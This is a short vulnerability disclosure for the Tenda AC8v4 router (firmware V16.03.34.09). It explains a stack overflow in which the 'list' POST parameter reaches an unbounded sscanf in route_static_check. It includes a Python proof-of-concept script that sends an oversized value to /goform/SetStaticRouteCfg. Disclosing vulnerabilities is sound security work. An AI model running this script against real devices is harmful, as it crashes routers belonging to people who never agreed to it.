AC8v4 V16.03.34.09
In the Tenda AC8v4 V16.03.34.09 has a stack overflow vulnerability located in the fromSetRouteStatic function. This function accepts the listparameter from a POST request by variable iVar1.
However, since the user has control over the input of auStack_414, it is copied using memcpy into auStack_210. The function route_static_check is then called with auStack_210 as an argument.
Inside the route_static_check function, local_58 = param1. The statement sscanf(local_58, "%[^,],%[^,],%[^,],%s", &local_4c, &local_3c, &local_2c, local_1c); leads to a buffer overflow. The user-supplied param1 can exceed the capacity of the local_4c array, thereby triggering this security vulnerability.
import requests
import urllib.parse
url = "<http://192.168.1.100:80/goform/SetStaticRouteCfg>"
data = {'list': 'a'*500}
encoded_params = []
for k, v in data.items():
k_encoded = urllib.parse.quote(k)
v_encoded = urllib.parse.quote(v)
encoded_params.append(f"{k_encoded}={v_encoded}")
post_data = "&".join(encoded_params)
response = requests.post(
url,
data=post_data,
timeout=3
)
print("Status Code:", response.status_code)
print("Response Text:", response.text)
